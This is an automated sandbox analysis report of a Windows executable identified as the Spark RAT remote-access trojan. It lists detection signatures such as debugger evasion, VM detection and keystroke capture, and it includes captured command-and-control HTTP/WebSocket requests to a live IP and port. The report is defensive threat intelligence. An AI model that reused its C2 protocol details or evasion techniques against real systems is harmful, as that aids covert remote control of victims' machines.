Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
msoia.exe

Overview

General Information

Sample name:msoia.exe
Analysis ID:1541453
MD5:42cbc8f4803da0f2b8bbd3d13a37fc58
SHA1:c82f1ba623b5f4210ddf7f20c40d4cec70298d92
SHA256:fcf9b70253437c56bb00315da859ce8e40d6410ec405c1473b374359d5277209
Tags:exeuser-N3utralZ0ne
Infos:

Detection

Spark RAT
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Suricata IDS alerts for network traffic
Yara detected Spark RAT
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Hides threads from debuggers
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Sigma detected: Potentially Suspicious Malware Callback Communication
Tries to detect debuggers (CloseHandle check)
Tries to evade analysis by execution special instruction (VM detection)
Uses known network protocols on non-standard ports
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Entry point lies outside standard sections
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • msoia.exe (PID: 7004 cmdline: "C:\Users\user\Desktop\msoia.exe" MD5: 42CBC8F4803DA0F2B8BBD3D13A37FC58)
    • conhost.exe (PID: 7036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6008 cmdline: cmd ver MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000000.00000002.3007239925.00000000010A9000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_SparkRATYara detected Spark RATJoe Security
    Process Memory Space: msoia.exe PID: 7004JoeSecurity_SparkRATYara detected Spark RATJoe Security

      System Summary

      barindex
      Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 67.217.62.106, DestinationIsIpv6: false, DestinationPort: 4443, EventID: 3, Image: C:\Users\user\Desktop\msoia.exe, Initiated: true, ProcessId: 7004, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-24T21:05:17.355535+020020476811A Network Trojan was detected192.168.2.44973267.217.62.1064443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-24T21:05:11.707648+020020466691Malware Command and Control Activity Detected192.168.2.44973067.217.62.1064443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-24T21:05:17.355535+020028551511A Network Trojan was detected192.168.2.44973267.217.62.1064443TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: msoia.exeJoe Sandbox ML: detected
      Source: msoia.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2047681 - Severity 1 - ET MALWARE Spark RAT CnC Checkin (POST) : 192.168.2.4:49732 -> 67.217.62.106:4443
      Source: Network trafficSuricata IDS: 2046669 - Severity 1 - ET MALWARE Win32/SparkRAT CnC Checkin (GET) : 192.168.2.4:49730 -> 67.217.62.106:4443
      Source: Network trafficSuricata IDS: 2855151 - Severity 1 - ETPRO MALWARE Spark RAT User-Agent Observed : 192.168.2.4:49732 -> 67.217.62.106:4443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 4443
      Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 4443
      Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49732
      Source: global trafficTCP traffic: 192.168.2.4:49730 -> 67.217.62.106:4443
      Source: Joe Sandbox ViewIP Address: 67.217.62.106 67.217.62.106
      Source: Joe Sandbox ViewASN Name: IS-AS-1US IS-AS-1US
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: unknownTCP traffic detected without corresponding DNS query: 67.217.62.106
      Source: global trafficHTTP traffic detected: GET /ws HTTP/1.1Host: 67.217.62.106:4443User-Agent: Go-http-client/1.1Connection: UpgradeKey: 4fdab31bb8e2932dfe20f92f3fdea3e6eebd95389486a97ad3543bb1583efe62Sec-WebSocket-Key: jhCCtGGF33HQoR6MWGiUwQ==Sec-WebSocket-Version: 13UUID: b43dfc4b543363da522193b18b484cdbUpgrade: websocket
      Source: unknownHTTP traffic detected: POST /api/client/update?arch=amd64&commit=08059e95dacafe0bf6e5782f8e2c8ec9cd8c5a17&os=windows HTTP/1.1Host: 67.217.62.106:4443User-Agent: SPARK COMMIT: 08059e95dacafe0bf6e5782f8e2c8ec9cd8c5a17Content-Length: 384Content-Type: application/octet-streamSecret: 9720ab8477877d05d378b601eb96dd83d800b53b6e2aeb71f69584a5b85b7ee6Accept-Encoding: gzipData Raw: 00 d1 90 85 18 8b ff 63 98 5e 11 5e 5d b8 69 9e 0f 49 58 c3 2f 19 02 7d f2 15 50 2a 9c 28 49 96 4b df 81 9d b6 f0 bc d5 80 19 14 f1 3e 58 d4 71 3d 91 b2 c8 8c 7b 77 cf fc c2 6d 39 a2 b0 3c 29 f6 e3 42 96 e0 37 ad 9a 86 3b 45 1b b1 1b 97 f3 79 24 d7 2f 8d 44 ab 4b bb 42 41 db 78 e1 69 5e ca 75 94 a9 9b f5 53 e8 5c c1 36 85 7e d9 e9 41 4e 00 38 1e 1b 76 82 2f fb 85 d1 d0 88 86 2c fc 6f aa 8a 58 46 8a 30 61 fb 6f ca ad a8 a0 c5 9b c1 a2 d4 f3 22 da ec 6b 66 6b 36 64 87 88 ed da 4e fc fc 2e 12 e3 84 68 40 f6 cb 76 b1 25 4d 1a b9 a3 0d f9 d6 85 72 de 26 7d 13 09 73 69 0d 3d 06 5c 7a 45 4f 86 a6 0a 74 e4 ff 04 a4 c7 b9 e7 6a 6e e3 68 1f e5 03 dc d4 68 e4 5e 30 03 59 f6 68 1f 64 af cb 5d 03 2e 39 3f 39 67 f4 9a a7 e9 5a 53 bb 85 c7 8c 08 0e 55 f3 7e 0b d0 56 13 ec 7c 5d 39 45 f5 83 d3 29 67 7b 08 9d b7 3c 07 1f 06 96 98 c9 68 89 23 fb 0e 23 50 2e ae 1a 6f 97 6f 00 96 11 47 f3 65 09 5a e1 1c 89 a7 81 1f 60 34 58 78 0d f8 e2 c7 18 0c 3a 69 7e 73 7c 8e 96 8d 7c 49 de e2 97 85 7a 3e b7 3e 7c ff 2d f9 13 1c f2 70 ed a9 89 6b 7e 12 ff b9 6d 4e 6e 0f be 73 3d ce 03 85 79 67 82 61 4d 5f aa c8 f6 f0 c7 b8 f2 f3 d4 4d bc a4 87 c4 79 dd 9c 84 41 1a 35 Data Ascii: c^^]iIX/}P*(IK>Xq={wm9<)B7;Ey$/DKBAxi^uS\6~AN8v/,oXF0ao"kfk6dN.h@v%Mr&}si=\zEOtjnhh^0Yhd].9?9gZSU~V|]9E)g{<h##P.ooGeZ`4Xx:i~s||Iz>>|-pk~mNns=ygaM_MyA5
      Source: msoia.exe, 00000000.00000002.3007239925.00000000010A9000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: (no semicolon) is unavailable()<>@,;:\"/[]?=,M3.2.0,M11.1.0-- is not valid0601021504Z0700476837158203125: cannot parse <invalid Value>ASCII_Hex_DigitAccept-EncodingAccept-LanguageAddDllDirectoryCLSIDFromProgIDCLSIDFromStringCallWindowProcWClientAuthType(CreateHardLinkWCreatePopupMenuCreateWindowExWDeviceIoControlDiacriticalDot;DialogBoxParamWDoubleRightTee;DownLeftVector;DragAcceptFilesDrawThemeTextExDuplicateHandleEBCDIC-CyrillicExcludeClipRectFailed to find Failed to load FindNextVolumeWFindVolumeCloseFlushViewOfFileGateway TimeoutGdiplusShutdownGetActiveObjectGetActiveWindowGetAdaptersInfoGetCommTimeoutsGetCommandLineWGetDpiForWindowGetEnhMetaFileWGetMonitorInfoWGetProcessTimesGetRawInputDataGetSecurityInfoGetStartupInfoWGetTextMetricsWGetThreadLocaleGreaterGreater;Hanifi_RohingyaHorizontalLine;ISO-10646-UCS-2ISO-10646-UCS-4ISO-10646-UTF-1ISO-2022-CN-EXTISO121Canadian1ISO122Canadian2ISO139CSN369103ISO13JISC6220jpISO141JUSIB1002ISO14JISC6220roISO16PortugueseISO19LatinGreekISO47BSViewdataISO5427CyrillicISO60Norwegian1ISO61Norwegian2ISO646-JP-OCR-BISO646basic1983ISO_8859-1:1987ISO_8859-2:1987ISO_8859-3:1988ISO_8859-4:1988ISO_8859-5:1988ISO_8859-6:1987ISO_8859-7:1987ISO_8859-8:1988ISO_8859-9:1989Idempotency-KeyImpersonateSelfInsertMenuItemWInvisibleComma;InvisibleTimes;IsWindowEnabledIsWindowVisibleIsWow64Process2LeftDownVector;LeftRightArrow;Leftrightarrow;Length RequiredLessSlantEqual;LockWorkStationLongRightArrow;Longrightarrow;LowerLeftArrow;NestedLessLess;Not ImplementedNotGreaterLess;NotLessGreater;NotSubsetEqual;NotVerticalBar;NtResumeProcessOSDEBCDICDF0415OleUninitializeOpenCurlyQuote;OpenThreadTokenOther_LowercaseOther_UppercasePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512Partial ContentPlayEnhMetaFilePostQuitMessageProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutReverseElement;RightTeeVector;RightVectorBar;RtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockSameSite=StrictSetActiveWindowSetCommTimeoutsSetSecurityInfoSetSuspendStateSetVolumeLabelWSetWinEventHookShortDownArrow;ShortLeftArrow;SquareSuperset;StringFromCLSIDStringFromGUID2TERMINAL_OUTPUTTERMINAL_RESIZETildeFullEqual;TrackMouseEventUnicodeJapaneseUnmapViewOfFileUpperLeftArrow;WindowFromPointWindows30Latin1Windows31Latin1Windows31Latin2Windows31Latin5X-Forwarded-ForZeroWidthSpace;]memstr_35de6992-8
      Source: classification engineClassification label: mal92.troj.evad.winEXE@4/1@0/1
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7036:120:WilError_03
      Source: C:\Users\user\Desktop\msoia.exeFile opened: C:\Windows\system32\6ec84874b867175fdfa32d548bdbbac49283c91d50340984410e80dd4dd6028aAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
